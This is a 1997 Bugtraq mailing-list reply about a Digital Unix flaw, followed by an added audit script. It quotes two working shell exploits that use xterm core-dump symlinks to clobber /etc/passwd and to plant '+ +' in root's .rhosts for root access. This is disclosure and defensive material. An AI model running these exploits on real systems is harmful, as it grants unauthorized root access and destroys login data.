Bugtraq mailing list archives
Re: Digital Unix Security Problem
From: tom () SBA MIAMI EDU (Tom Leffingwell)
Date: Thu, 13 Nov 1997 18:22:58 -0500
DU doesn't allow +'s in /.rhosts, at least under C2, and I think so in general. It doesn't seem to work even if you specify a user, either.

On Thu, 13 Nov 1997, Andrew Brown wrote:
Even with a buffer overflow, I've never seen anyone exploit on one DU. If anyone has done so successfully, please email me. Despite that, a person with basic knowledge of unix could easily do something like:

    #!/bin/csh
    cd /tmp
    ln -s /etc/passwd /tmp/core
    setenv DISPLAY abcdefghi
    /usr/bin/X11/xterm

The contents of /etc/passwd becomes xterm's core, preventing further logins. Obviously you could do things without an immediate impact such as ln -s /vmunix /tmp/core.

or...if the system you're on is actually running r-services, you could do

    #!/bin/sh
    DISPLAY=" + + "
    export DISPLAY
    cd /tmp
    ln -s /.rhosts /tmp/core
    /usr/bin/X11/xterm
    rsh localhost

which sets the DISPLAY variable to an "admit all from all" line and the core dump will go into root's .rhosts file. then all that remains is the rsh localhost and you're all set! considerably easier than a buffer overflow exploit...

--
|-----< "CODE WARRIOR" >-----|
andrew () echonyc com (TheMan)   * "ah! i see you have the internet
codewarrior () daemon org           that goes *ping*!"
warfare () graffiti com          * "information is power -- share the wealth."
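
An added audit example, not part of the original messages: both scripts quoted above depend on a symbolic link named core sitting in a world-writable directory, and the second also on a "+" entry ending up in an .rhosts file. The function names and the sample files below are assumptions made for illustration; readlink is assumed to be available.

```shell
#!/bin/sh
# Added example (not from the thread): look for the two conditions the
# quoted scripts rely on. Function names are hypothetical.

# Print "link -> target" for every symbolic link named core or core.*
# directly inside DIR. Dangling links are reported too, since a dump
# written through one would create the target.
find_core_symlinks() {
    dir=$1
    for f in "$dir"/core "$dir"/core.*; do
        [ -L "$f" ] || continue          # regular core files are ignored
        printf '%s -> %s\n' "$f" "$(readlink "$f")"
    done
}

# Return 0 if FILE has a line whose host or user field is a bare "+",
# i.e. a wildcard trust entry.
rhosts_has_wildcard() {
    awk '{ for (i = 1; i <= NF && i <= 2; i++) if ($i == "+") found = 1 }
         END { exit !found }' "$1"
}

# Constructed demo: a scratch directory with a planted link and a
# sample rhosts-style file.
demo=$(mktemp -d)
ln -s /etc/passwd "$demo/core"
printf 'trusted.example.org alice\n+ +\n' > "$demo/rhosts.sample"
find_core_symlinks "$demo"
rhosts_has_wildcard "$demo/rhosts.sample" && echo "wildcard entry in $demo/rhosts.sample"
rm -rf "$demo"
```

Run the first function against /tmp and any other world-writable directory, and the second against each .rhosts file on hosts that still run the r-services.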